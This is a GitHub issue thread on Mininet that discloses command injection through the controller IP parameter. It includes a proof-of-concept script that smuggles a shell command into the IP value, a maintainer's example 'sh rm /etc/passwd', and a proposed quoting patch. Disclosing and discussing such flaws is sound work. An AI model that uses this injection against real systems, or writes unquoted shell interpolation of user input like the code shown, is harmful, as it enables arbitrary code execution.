### ISSUE TITLE
security issue in mininet, may cause arbitary code execution

### ISSUE THREAD

**Issue by kericwy1337** [mininet/mininet#850]
Mininet uses GitHub issues for bug reports and feature requests only.
These issues can be viewed at bugs.mininet.org

If you have a question that is not a bug report or a feature request,
please use the documentation at docs.mininet.org, the FAQ
at faq.mininet.org, and the mininet-discuss mailing list.

For bug reports, please fill in the following information in detail,
and also feel free to include additional information such as debug
output from mn -v debug, etc.
--- Cut Here ---
### Expected/Desired Behavior:
create an mininet network.

### Actual Behavior:
arbitary code execution

### Detailed Steps to Reproduce the Behavior:
We found a security issue that may cause arbitary code execution.

the call stack is:
`Controller` => `__init__` => `checkListening` => `listening = self.cmd( "echo A | telnet -e A %s %d" % ( self.ip, self.port ) )`
source code:
```python
# mininet/mininet/node.py
class Controller( Node ):
    """A Controller is a Node that is running (or has execed?) an
       OpenFlow controller."""

    def __init__( self, name, inNamespace=False, command='controller',
                  cargs='-v ptcp:%d', cdir=None, ip="127.0.0.1",
                  port=6653, protocol='tcp', **params ):
        self.command = command
        self.cargs = cargs
        self.cdir = cdir
        # Accept 'ip:port' syntax as shorthand
        if ':' in ip:
            ip, port = ip.split( ':' )
            port = int( port )
        self.ip = ip
        self.port = port
        self.protocol = protocol
        Node.__init__( self, name, inNamespace=inNamespace,
                       ip=ip, **params  )
        self.checkListening()

    def checkListening( self ):
        "Make sure no controllers are running on our port"
        # Verify that Telnet is installed first:
        out, _err, returnCode = errRun( "which telnet" )
        if 'telnet' not in out or returnCode != 0:
            raise Exception( "Error running telnet to check for listening "
                             "controllers; please check that it is "
                             "installed." )
        listening = self.cmd( "echo A | telnet -e A %s %d" %
                              ( self.ip, self.port ) )
        if 'Connected' in listening:
            servers = self.cmd( 'netstat -natp' ).split( '\n' )
            pstr = ':%d ' % self.port
            clist = servers[ 0:1 ] + [ s for s in servers if pstr in s ]
            raise Exception( "Please shut down the controller which is"
                             " running on port %d:\n" % self.port +
                             '\n'.join( clist ) )

```
We focus on:
```python
listening = self.cmd( "echo A | telnet -e A %s %d" % ( self.ip, self.port ) )
```
self.cmd() execute what ever passed to it. We can see that `self.ip` and `self.port` are user controllable inputs，without any kind of filter or other defences. So if we gave a malicious IP, we can get an arbitary code execution.

Using self.cmd() without defence is quite dangerous, because sometimes the attacker can control the input of ip or port. For example, the supply chain attack, or some developer encapsulate mininet with a web page so that the attacker may give a malicious IP/PORT to make arbitary code execution.

We strongly suggest to add some kind of defence here, or totally change the mechanism of some functions.

Our exploit is as follows:
```python
#!/usr/bin/python

from mininet.net import Mininet
from mininet.node import RemoteController
from mininet.log import setLogLevel, info

CONTROLLER_IP='127.0.0.1;id>/tmp/youarehacked;#'
CONTROLLER_PORT=6653

info('Controller IP Addr:', CONTROLLER_IP, '\n' )
info('Controller Port:', CONTROLLER_PORT, '\n' )

def customNet():
    net = Mininet( topo=None, build=False )
    info( 'Adding controller\n' )
    net.addController( 'c0',
        controller=RemoteController,
        ip=CONTROLLER_IP,
        port=CONTROLLER_PORT
        )

if __name__ == '__main__':
    setLogLevel( 'info' )
    customNet()

```

the results is shown below:

![](https://i.imgur.com/rSASr53.png)

### Additional Information:
please think about fixing this kind of security problems.

**Comment by lantz** [comment]
I don't recommend running untrusted Python scripts (or any untrusted code) as root.

If you're looking for an "exploit," why not just use the shell escape?

    mininet> sh rm /etc/passwd

By design, Mininet runs as root and permits shell escapes, but it can be run in a container or VM if you wish greater isolation.

However, I would consider a patch to make it possible to run Mininet as a non-root user, if you are interested in putting one together.

**Comment by kericwy1337** [comment]
Yes, i totally agree that a user shouldn't run untrusted scripts, and some mininet REPL function is designed for command execution(such as the sh).
However, i focus about the \_\_init\_\_ in Controller.
what i want so say is that  in \_\_init\_\_ of controller, that suggested to be some kind of IP check and PORT check. because that developer don't know what happened is the mininet library, he my use an user input as the IP and PORT in \_\_init\_\_ with out any kind of defence. that could cause command execution. and those developer's machine may get compromised.
To make the mininet library safer and more people could use it without worrying about security problems , i just suggest to add some kind of check in \_\_init\_\_ function.
The easiest regex could solve the possible risk of command execution :）

examples of checking IP
checking if IP is a domain name:
`^(?=^.{3,255}$)[a-zA-Z0-9][-a-zA-Z0-9]{0,62}(\.[a-zA-Z0-9][-a-zA-Z0-9]{0,62})+$`
checking if IP is an IP:
`((2[0-4]\d|25[0-5]|[01]?\d\d?)\.){3}(2[0-4]\d|25[0-5]|[01]?\d\d?)`
a simple check by regex for IP and PORT param could make the mininet library safer :)

thanks for your hard working for mininet, and hope the mininet could be better and better :)

**Comment by kericwy1337** [comment]
If a developer what to write his UI website for creating SDN network, I think depending the developer to check the user-input of IP and PORT is not so practical...... cause many developers will simplely pass the user input to the \_\_init\_\_ of Controller......And that may cause problems.

To avoid these kind of problem from the root...... it's better perform a check in \_\_init\_\_ ......
thanks : )

**Comment by lantz** [comment]
I'm not convinced that input vetting makes it any more secure, and it makes the code more complicated, which can make it harder to understand and less reliable. 

**However, feel free to submit a pull request if you think it's actually useful.**

As I noted, since Mininet currently runs as root the best idea is to run it in its own VM, and that's what we recommend.

It's also possible to run Mininet in a container with virtual root rather than real root. However, since it shares the same kernel it's not particularly secure.

It may also be possible to make Mininet run with more granular capabilities; at the minimum, it would need to be able to create network namespaces and to add interfaces in both the root and host namespaces.

At the end of the day, you're running a Python script with root access, so you shouldn't accept untrusted input.

**Comment by kericwy1337** [comment]
yep, i see that people should run mininet in virtual machine. However, one may run it on his server to create a SDN environment, that may cause proplem .
maybe because i majored in cyber security, so i am more sensitive to some kind of problems. : )
All right, I will submit a pull request these days to make it safer : )

**Comment by lantz** [comment]
I don't understand the argument that it would somehow "make it safer."

How would youn "exploit" this without either 1) running malicious/untrusted code as root (as in your example) or 2) accepting malicious/untrusted user input into a script running as root?

Are you expecting that a rogue DNS server could be used to exploit this somehow, or ???

That being said, I think the right approach in the long run (e.g. Mininet 3.x) might be to make IP addresses first class objects which are also interoperable with strings (perhaps a subclass of string or something.) The "simple" fix would be to vet input, but that isn't scalable and makes the code harder to read and understand.

**Comment by cheriimoya** [comment]
wouldn't it be sufficient to simply apply this small change?
```diff
-listening = self.cmd( "echo A | telnet -e A %s %d" % ( self.ip, self.port ) )
+listening = self.cmd( "echo A | telnet -e A '%s' '%d'" % ( self.ip, self.port ) )
```

**Comment by cheriimoya** [comment]
> wouldn't it be sufficient to simply apply this small change?
> 
> ```diff
> -listening = self.cmd( "echo A | telnet -e A %s %d" % ( self.ip, self.port ) )
> +listening = self.cmd( "echo A | telnet -e A '%s' '%d'" % ( self.ip, self.port ) )
> ```

when trying your exploit with this patch, i get
```
$ sudo python3 exploit.py
Adding controller
Unable to contact the remote controller at 127.0.0.1;id>/tmp/youarehacked;#:6653
```
